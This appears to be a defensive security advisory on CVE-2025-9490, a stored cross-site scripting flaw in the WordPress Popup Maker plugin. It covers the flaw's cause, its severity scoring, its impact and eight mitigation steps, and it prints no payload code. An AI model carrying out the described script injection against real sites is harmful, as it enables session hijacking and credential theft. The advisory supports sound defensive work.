CVE-2025-9490 is a stored Cross-Site Scripting (XSS) vulnerability identified in the Popup Maker plugin for WordPress, developed by danieliser. This vulnerability exists in all versions up to and including 1.20.6 due to insufficient sanitization and escaping of the 'title' parameter during web page generation. Specifically, the plugin fails to properly neutralize input, allowing an authenticated attacker with Contributor-level permissions or higher to inject arbitrary JavaScript code into popup titles. Once injected, this malicious script executes in the context of any user who accesses the affected page, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the user. The vulnerability is classified under CWE-79, which covers improper neutralization of input during web page generation, a common vector for XSS attacks. The CVSS v3.1 base score is 6.4, reflecting a medium severity level, with an attack vector of network, low attack complexity, requiring privileges (authenticated user), no user interaction, and scope change due to impact on other components. No public exploits have been reported yet, but the vulnerability poses a significant risk in environments where multiple users have content creation privileges. The lack of available patches at the time of reporting necessitates immediate attention from site administrators to implement workarounds or restrict user permissions.

The primary impact of this vulnerability is the potential for attackers with Contributor-level access to inject persistent malicious scripts into WordPress sites using the Popup Maker plugin. This can compromise the confidentiality and integrity of user data by enabling session hijacking, theft of cookies or credentials, and unauthorized actions performed under the victim's identity. While availability is not directly impacted, the trustworthiness of the affected websites can be severely damaged, leading to reputational harm and loss of customer confidence. Organizations relying on this plugin for marketing or user engagement may face increased risk of targeted attacks, especially if they have multiple contributors or editors with elevated privileges. The scope of affected systems is broad, given the widespread use of WordPress and the popularity of popup plugins for conversion optimization. Attackers do not require user interaction to trigger the malicious script once injected, increasing the risk of automated or widespread exploitation. Although no known exploits are currently in the wild, the vulnerability's medium severity and ease of exploitation by authenticated users make it a credible threat to many organizations globally.

1. Immediate mitigation involves restricting Contributor-level and higher user permissions to trusted personnel only, minimizing the risk of malicious script injection. 2. Site administrators should monitor and audit popup titles and other user-generated content for suspicious scripts or anomalies. 3. Employ Web Application Firewalls (WAFs) with custom rules to detect and block common XSS payloads targeting the 'title' parameter in Popup Maker popups. 4. Disable or limit the use of the Popup Maker plugin until an official patch or update is released by the vendor. 5. Implement Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts on affected pages, reducing the impact of potential XSS payloads. 6. Regularly update WordPress core and all plugins to the latest versions once patches become available. 7. Educate content contributors about safe input practices and the risks of injecting untrusted content. 8. Consider alternative popup plugins with better security track records if immediate patching is not feasible. These steps go beyond generic advice by focusing on permission management, proactive monitoring, and layered defenses specific to the Popup Maker plugin's vulnerability.